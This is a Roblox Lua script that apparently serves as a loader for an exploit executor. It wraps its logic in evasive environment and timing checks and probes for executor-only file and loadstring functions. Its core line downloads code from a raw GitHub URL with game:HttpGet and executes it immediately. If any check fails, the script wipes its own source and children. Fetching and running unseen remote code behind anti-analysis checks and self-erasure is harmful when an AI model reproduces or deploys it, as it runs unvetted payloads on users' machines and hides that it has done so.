local BS_ProtectedExecute = function(BS_protectedCode, ...)
    if game.Close ~= game.Close then return end
    
    local BS_envCheck = function()
        if game then return end
    end
    
    local BS_BindableEvent = Instance.new("BindableEvent")
    local BS_SecretStatusCode
    
    task.defer(function()
        if BS_SecretStatusCode then
            BS_SecretStatusCode = 2
            BS_BindableEvent:Fire()
        end
    end)
    
    BS_SecretStatusCode = 1
    BS_BindableEvent.Event:Wait()
    
    if BS_SecretStatusCode ~= 2 then return end
    
    local BS_CanProceed = false
    local BS_BindableFunction = Instance.new("BindableFunction")
    
    function BS_BindableFunction.OnInvoke(BS_Num, ...)
        if BS_CanProceed then
            if BS_Num ~= 2 then return true end
            
            return setfenv(
                function(BS_RANDOM_VARIABLE_NAME_Env, ...)
                    local BS_RANDOM_VARIABLE_NAME = nil
                    
                    return BS_RANDOM_VARIABLE_NAME_Env.setfenv(function(...)
                        return BS_protectedCode(...)
                    end, BS_RANDOM_VARIABLE_NAME_Env)(...)
                end,
                setmetatable({}, {
                    __index = function(_, BS_Key)
                        if BS_Key == "BS_RANDOM_VARIABLE_NAME" then
                            return function() end
                        end
                        return getfenv()[BS_Key]
                    end,
                })
            )(getfenv(), ...)
        end
        
        BS_CanProceed = true
        return nil
    end
    
    local BS_Result = BS_BindableFunction:Invoke()
    
    if BS_Result then 
        BS_BindableFunction = BS_BindableFunction:Destroy()
        return BS_Result 
    end
    
    return (function(...)
        BS_BindableFunction = BS_BindableFunction:Destroy()
        return ...
    end)(BS_BindableFunction:Invoke(2, ...))
end

return BS_ProtectedExecute(function(...)
    local function BS_probeArith()
        local BS_chunk, _ = loadstring([[
            local a = "hello"
            local b = 2
            return a - b
        ]])
        if not BS_chunk then return false end

        local BS_ok, _ = pcall(BS_chunk)
        return not BS_ok        
    end

    local function BS_probeCall()
        local BS_ok, _ = pcall(function() (nil)() end)
        return not BS_ok
    end

    local function BS_probeFS()
        local BS_ok, _ = pcall(function()
            if not isfolder("BS_script") then makefolder("BS_script") end
            if not isfolder("BS_script/Music") then makefolder("BS_script/Music") end
        end)
        return BS_ok and isfolder("BS_script/Music")
    end

    local function BS_coreLogic()
    
loadstring(game:HttpGet("https://raw.githubusercontent.com/ROB5201314/ROBScript2/refs/heads/main/妈妈脚本已起动.rob"))()

    end

    local function BS_safeEntry()
        if not BS_probeArith() then return nil, "block:arith" end
        if not BS_probeCall()  then return nil, "block:call"  end
        if not BS_probeFS()    then return nil, "block:fs"    end
        return BS_coreLogic()
    end

    local BS_success, BS_tag = BS_safeEntry()
    if not BS_success then
        script:ClearAllChildren()
        script.Source = ""
        return
    end
end, ...)
